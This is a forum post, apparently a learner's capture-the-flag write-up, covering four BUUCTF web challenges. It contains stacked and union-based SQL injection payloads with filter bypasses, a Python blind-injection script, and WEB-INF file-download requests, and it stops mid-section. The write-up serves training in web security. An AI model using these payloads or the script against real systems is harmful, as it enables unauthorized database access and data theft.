ToB企服应用市场:ToB评测及商务社交产业平台

标题: BUUCTF-WEB(31-35) [打印本页]
作者: 北冰洋以北    时间: 2024-5-23 19:35
标题: BUUCTF-WEB(31-35)
[GYCTF2020]Blacklist

参考:
[GYCTF2020]Blacklist 1详解(handler下令用法!)-CSDN博客
SQL注入一些过滤及绕过总结_sql注入过滤-CSDN博客
过滤了这些内容。包括大写,由于是正则匹配,无法双写绕过
这里其实我又试了试注释符绕过,但是没有任何回显

但是我发现可以堆叠注入,因为这道题的框我前面见过,那道题的升级版
爆数据库
  1. 1';show database;#
复制代码

爆表
  1. 1';show tables;#
复制代码

爆列:
  1. 1';show columns from FlagHere;#
复制代码

看了wp,学到了handler这个下令
  1. 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;
复制代码

[CISCN2019 华北赛区 Day2 Web1]Hack World

参考:
[BUUCTF:CISCN2019 华北赛区 Day2 Web1]Hack World-CSDN博客
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解-阿里云开发者社区 (aliyun.com)
表还有字段都有了,然后盲注
大佬的脚本:
  1. # -*- coding:utf-8 -*-
  2. # Author: mochu7
  3. import requests
  4. import string
  6. def blind_injection(url):
  7.         flag = ''
  8.         strings = string.printable
  9.         for num in range(1,60):
  10.                 for i in strings:
  11.                         payload = '(select(ascii(mid(flag,{0},1))={1})from(flag))'.format(num,ord(i))
  12.                         post_data = {"id":payload}
  13.                         res = requests.post(url=url,data=post_data)
  14.                         if 'Hello' in res.text:
  15.                                 flag += i
  16.                                 print(flag)
  17.                         else:
  18.                                 continue
  19.         print(flag)
  22. if __name__ == '__main__':
  23.         url = 'http://6536f1ec-e085-4588-bc35-c00a2ac6b093.node5.buuoj.cn:81/index.php'
  24.         blind_injection(url)
复制代码
这边跑出来了,交flag对不了,也挺奇怪
[RoarCTF 2019]Easy Java

参考:
[刷题RoarCTF 2019]Easy Java - kar3a - 博客园 (cnblogs.com)
[(详解)RoarCTF 2019]Easy Java-CSDN博客
[RoarCTF 2019]Easy Java - 春告鳥 - 博客园 (cnblogs.com)
我对java这个网站不太了解,所以也是直接看师傅们的博客了
这里也是打开help这个链接,之后发现可能有下载的毛病

但是是下载不了的,我们改成POST请求就可以成功发送请求,下载文件
下载了help.docx是没有flag的

翻了师傅们的博客,知道
  1. WEB-INF主要包含一下文件或目录:
  2.     /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
  3.     /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
  4.     /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
  5.     /WEB-INF/src/:源码目录,按照包名结构放置各个java文件。
  6.     /WEB-INF/database.properties:数据库配置文件
  7. 漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码
复制代码
那我们POST发送
  1. filename=/WEB-INF/web.xml
复制代码
下载后也是发现了关键信息

然后下载
  1. filename=/WEB-INF/classes/com/wm/ctf/FlagController.class
复制代码
给代码里面的base64解密得到flag

[网鼎杯 2018]Fakebook

参考:
[BUUCTF:网鼎杯 2018]Fakebook_fakebook buuctf-CSDN博客
[buuctf-网鼎杯 2018]Fakebook 1 - junlebao - 博客园 (cnblogs.com)
目次扫描,找到了robots.txt,flag.php

访问了一下,什么没有
但是我看wp这里都说是user.php.bak
我们下载下来发现是个反序列化

注册账号后发现有个no参数,我们尝试注入一下

输入1',根据报错应该是数字型的

爆字段数,一共有四个
  1. 1 order by 5
复制代码

爆回显位置,然后union select被过滤了,我们用注释绕过
  1. -1 union/**/select 1,2,3,4
复制代码
剩下就是正常注入
  1. -1 union/**/select 1,database(),3,4  // 爆库
  2. -1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where  table_schema='fakebook'  // 爆表
  3. -1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where  table_schema='fakebook' and table_name='users' // 爆列
  4. -1 union/**/select 1,group_concat(username,'-',passwd,'-',data),3,4 from fakebook.users // 爆数据
复制代码

我们发现这个data这个数据就是序列化的内容,我们再看一下那个文件
[code]



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4